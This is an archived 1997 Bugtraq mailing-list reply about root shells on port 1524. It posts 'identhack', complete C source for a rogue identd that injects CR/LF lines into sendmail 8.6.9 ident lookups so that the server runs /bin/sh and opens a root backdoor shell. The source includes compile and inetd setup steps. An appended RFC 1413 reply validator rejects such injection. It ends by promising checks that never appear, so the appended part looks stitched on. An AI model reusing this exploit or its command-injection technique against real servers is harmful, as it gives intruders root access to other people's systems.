List: bugtraq
Subject: Re: Ingreslock Misconfiguration?
From: Matt <panzer () DHP ! COM>
Date: 1997-01-28 6:52:21
Khelbin Sunvold <khelbin@CONNIX.COM> wrote:
> Just fooling around the other day on a box running ingres and I tried
> telnetting to port 1524 (ingreslock) and was surprised to be dropped into a
> root shell.
Perhaps they were running 8.6.9 also.... See below:
--
-Matt (panzer@dhp.com) -- DataHaven Project - http://www.dhp.com/
"That which can never be enforced should not be prohibited."
/* identhack - sendmail identd hack.
 * Michael R. Widner - atreus (2/24/95)
 * <widner@uchicago.edu> <atreus@primus.com>
 *
 * Make sure you don't do anything evil with this. That would be wrong.
 *
 * This is a real simple hacked identd that will return a string to abuse
 * the sendmail 8.6.9 identd problem.
 * NOTE: This hack only works when sendmail queues up the message for
 * later delivery. This depends on the configuration of sendmail.cf and
 * on the machine loading. If you can do something to drag the machine to
 * its knees, then fire off this attack, you stand a much better chance of
 * success.
 *
 * This should compile ok with just [g]cc -o identhack identhack.c
 * Then add an appropriate entry in your inetd.conf and kill -HUP identd.
 * ident stream tcp nowait root /tmp/identhack in.identd
 * (identd port is 113, but hopefully your /etc/services knows that)
 *
 * Two noteworthy things: Most people configure their sendmail.cf with
 * Og1 and Ou1 lines, setting the default user to bin.bin. I see no way
 * to break root using this method if this is the case. bin seems like the
 * best case scenario.
 */
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/select.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
 */
#define TIMEOUT 120

/* OUTPUT_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE 2048
#define SOCKET_BUFFER_SIZE 100

unsigned short lport = 0, rport = 0;

int
main (void)
{
    fd_set fdset;
    struct timeval timeout;
    char buffer[OUTPUT_BUFFER_SIZE];
    char inbuffer[SOCKET_BUFFER_SIZE];
    int len;

    /* prepare to read ports */
    FD_ZERO (&fdset);
    FD_SET (0, &fdset);
    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    /* read ports from stdin (inetd hands us the connection on fd 0) */
    select (1, &fdset, NULL, NULL, &timeout);
    len = read (0, inbuffer, SOCKET_BUFFER_SIZE - 1);
    if (len <= 0)
        exit (0);
    inbuffer[len] = '\0';       /* read() does not NUL-terminate the port pair */
    FD_SET (0, &fdset);

    /* echo the port pair back, followed by the "userid" string that carries
     * the extra CR/LF-separated lines sendmail 8.6.9 will later re-read */
    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
        "atreus)\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, "
        "P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo ingreslock stream tcp nowait root "
        "/bin/sh /bin/sh > /tmp/badfile\">\r\nR<\"|/usr/etc/inetd /tmp/badfile\">\r\n$rascii "
        "The choice of commands to execute is virtually limitless. I chose to startup a copy "
        "of inetd with /bin/sh answering on the ingreslock port, which is 1524. I only chose "
        "this particular port because it's in most /etc/services and sun inetd won't accept "
        "port numbers here, only services defined in /etc/services or services.byname if "
        "you're using yp. Of course the syntax will vary by systems, as will the location of "
        "inetd. So an intruder must at least know what type of system he's going after.");
    write (1, buffer, strlen (buffer));
    exit (0);
}
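The reply identhack emits is an otherwise normal RFC 1413 answer whose userid field carries extra CR/LF-separated lines; a client that trusts the whole string ends up with configuration text where a username should be. As an added example, not part of the original post or of identhack, here is the kind of strict ident reply validator an ident client (sendmail's lookup included) should apply before using the answer; the function names and the 64-byte userid cap are my own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define IDENT_MAX_USER 64  /* assumption: longest userid a client should accept */

/* Validate one RFC 1413 reply.  Returns 1 and copies the userid into user when
 * the reply is exactly one well-formed "lport , rport : USERID : os : user"
 * line; returns 0 (user left empty) otherwise, including for replies that
 * carry extra CR/LF-terminated lines the way identhack's payload does. */
int ident_reply_ok(const char *reply, char *user, size_t userlen)
{
    const char *p, *end = strstr(reply, "\r\n");
    char type[16], os[16];
    int lport, rport, n = 0;
    size_t ulen;

    user[0] = '\0';
    /* exactly one line: a CRLF terminator with nothing after it */
    if (end == NULL || end[2] != '\0')
        return 0;
    /* no control characters before the terminator (a bare LF is caught too) */
    for (p = reply; p < end; p++)
        if (iscntrl((unsigned char)*p))
            return 0;
    /* fixed prefix: port pair, the USERID response type, the opsys token;
     * %n records where the userid field starts (stays 0 on a mismatch) */
    if (sscanf(reply, " %d , %d : %15[A-Z] : %15[^ :] : %n",
               &lport, &rport, type, os, &n) != 4 || n == 0)
        return 0;
    if (strcmp(type, "USERID") != 0 ||
        lport < 1 || lport > 65535 || rport < 1 || rport > 65535)
        return 0;
    /* userid: the rest of the line, non-empty and bounded */
    ulen = (size_t)(end - (reply + n));
    if (ulen == 0 || ulen > IDENT_MAX_USER || ulen >= userlen)
        return 0;
    memcpy(user, reply + n, ulen);
    user[ulen] = '\0';
    return 1;
}

/* One-call wrapper: the accepted userid, or "" when the reply is rejected. */
const char *ident_user(const char *reply)
{
    static char user[IDENT_MAX_USER + 1];
    return ident_reply_ok(reply, user, sizeof user) ? user : "";
}
```

The sample replies in the checks below are constructed; the rejected one mirrors the shape of identhack's output (a second CRLF-terminated line after the userid).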